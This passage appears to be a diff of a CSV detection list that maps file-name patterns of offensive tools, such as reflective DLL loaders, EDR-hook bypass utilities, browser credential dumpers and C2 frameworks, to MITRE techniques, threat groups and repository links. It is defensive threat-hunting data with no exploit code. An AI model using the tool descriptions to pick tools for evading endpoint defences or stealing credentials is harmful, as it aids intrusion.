understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ReflectiveDll.*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" "*ReflectiveDll.x64.dll*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*ReflectiveDll.x86.dll*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" -"*ReflectiveDLLInjection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*ReflectiveDLLInjection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ReflectiveDLLInjection.*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" "*ReflectiveDLLInjection.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*ReflectiveDLLInjection.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ReflectiveDllInjection.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*ReflectiveDLLInjection.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveDllInjection.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*Reflective-HackBrowserData*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" -"*Reflective-HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*Reflective-HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" "*ReflectiveLoader.*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"*ReflectiveLoader.c*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ReflectiveLoader.c*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*ReflectiveLoader.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ReflectiveLoader.h*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*ReflectiveLoader.c*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveLoader.c*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*ReflectiveLoader.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ReflectiveLoader.h*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*ReflectiveNTDLL.cpp*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNTDLL.exe*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNTDLL.sln*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNTDLL.vcxproj*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*ReflectiveNtdll-main*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" -"*ReflectivePick_x64_orig.dll*","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1112","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ReflectivePick_x86_orig.dll*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1113","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ReflectivePick_x64_orig.dll*","offensive_tool_keyword","empire","Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1112","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ReflectivePick_x86_orig.dll*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1113","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*RefleXXion*ntdll.dll*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion.sln*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion-DLL*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*RefleXXion-EXE*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and 